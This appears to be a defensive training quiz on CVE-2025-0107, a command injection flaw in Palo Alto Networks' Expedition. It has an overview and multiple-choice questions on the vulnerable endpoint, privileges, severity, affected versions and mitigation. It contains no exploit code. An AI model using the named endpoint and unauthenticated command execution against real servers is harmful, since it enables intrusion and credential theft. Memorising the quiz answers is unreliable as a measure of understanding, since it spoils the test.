CVE-2025-0107
Overview
CVE-2025-0107 is an OS command injection vulnerability in Palo Alto Networks’ Expedition (the migration tool), affecting versions prior to 1.2.101, allowing unauthenticated remote attackers to execute arbitrary OS commands as www-data , leading to data exposure including usernames, cleartext passwords, device configurations, and API keys Palo Alto Networks SecurityOP Innovate. It has a CVSS v4.0 score of 7.7 (High severity) with network attack vector, low complexity, no privileges required, and no user interaction needed, with substantial downstream confidentiality impact NVDvulnerability.circl.lu.
Exploits target endpoints such as /API/regionsDiscovery.php , and CrowdSec has observed widespread exploitation in the wild since mid-2025 app.crowdsec.netFeedly.
Question.
Would you like to continue with a challenge question?
Exploit Vector Identification
Identify the exploit vector and privilege context related to CVE-2025-0107 OS Command Injection via /API/regionsDiscovery.php.
Question:
A security engineer notices suspicious traffic to /API/regionsDiscovery.php on an Expedition server.
Choose the vulnerability that is most likely being exploited:
A. CVE-2025-0103 (SQL Injection)
B. CVE-2025-0104 (XSS)
C. CVE-2025-0107 (OS Command Injection)
D. CVE-2025-0105 (File Deletion)
Privilege Context
Determine the privilege context for OS command execution in CVE-2025-0107 exploitation.
Question:
What is the privilege context under which the attacker executes OS commands in CVE-2025-0107 exploitation?
A. root
B. www-data
C. administrator
D. no privileges
Required Conditions
Identify the initial conditions required for exploiting CVE-2025-0107.
Question:
Which describes the initial attacker requirements for exploiting CVE-2025-0107?
A. Must be authenticated as an admin
B. Must trick a user into clicking a link
C. Can be unauthenticated and remote
D. Must have local shell access
Severity & Scoring
Determine the CVSS v4.0 severity score category for CVE-2025-0107.
Question:
CVE-2025-0107's CVSS v4.0 score is approximately:
A. 2.7 (Low)
B. 4.7 (Medium)
C. 7.7 (High)
D. 9.8 (Critical)
Version Impact
Identify the affected Expedition version(s) for CVE-2025-0107.
Question:
Which version of Expedition is affected by CVE-2025-0107?
A. 1.2.101 and later
B. 1.2.100 and earlier
C. Only version 1.2.101
D. All versions
Weakness Category
Identify the CWE category for CVE-2025-0107 based on its OS command injection weakness.
Question:
CVE-2025-0107 is categorized under which CWE?
A. CWE-79 (XSS)
B. CWE-89 (SQL Injection)
C. CWE-78 (OS Command Injection)
D. CWE-73 (File Path)
Real-World Detection
Summarize the real-world exploitation status of CVE-2025-0107.
Question:
Which statement about real-world exploitation of CVE-2025-0107 is correct?
A. No evidence of exploitation in the wild
B. CrowdSec reports increasing exploitation since mid-2025
C. Only limited exploitation via local plugins
D. Only exploited in controlled pentests
Immediate Mitigation
Identify the most effective immediate mitigation action for CVE-2025-0107.
Question:
What is the most effective immediate action to mitigate this vulnerability?
A. Reboot the server
B. Disable /API/regionsDiscovery.php endpoint
C. Upgrade Expedition to ≥ 1.2.101 or shut it down
D. Apply web application firewall (WAF) rules
Potential Impact Scope
Determine the range of assets at risk from CVE-2025-0107 exploitation.
Question:
What assets are at risk due to this vulnerability?
A. Only API keys
B. Usernames, passwords, device config, API keys
C. Firewall rules only
D. UI session tokens
Realistic Scenario
Question:
In a CTF scenario, which simulated exploit would best demonstrate CVE-2025-
0107?
A. SQL injection via /dbQuery.php
B. Stealing session via XSS in /userPanel
C. OS command injection via crafted GET to /API/regionsDiscovery.php
D. Deleting files via /deleteFile.php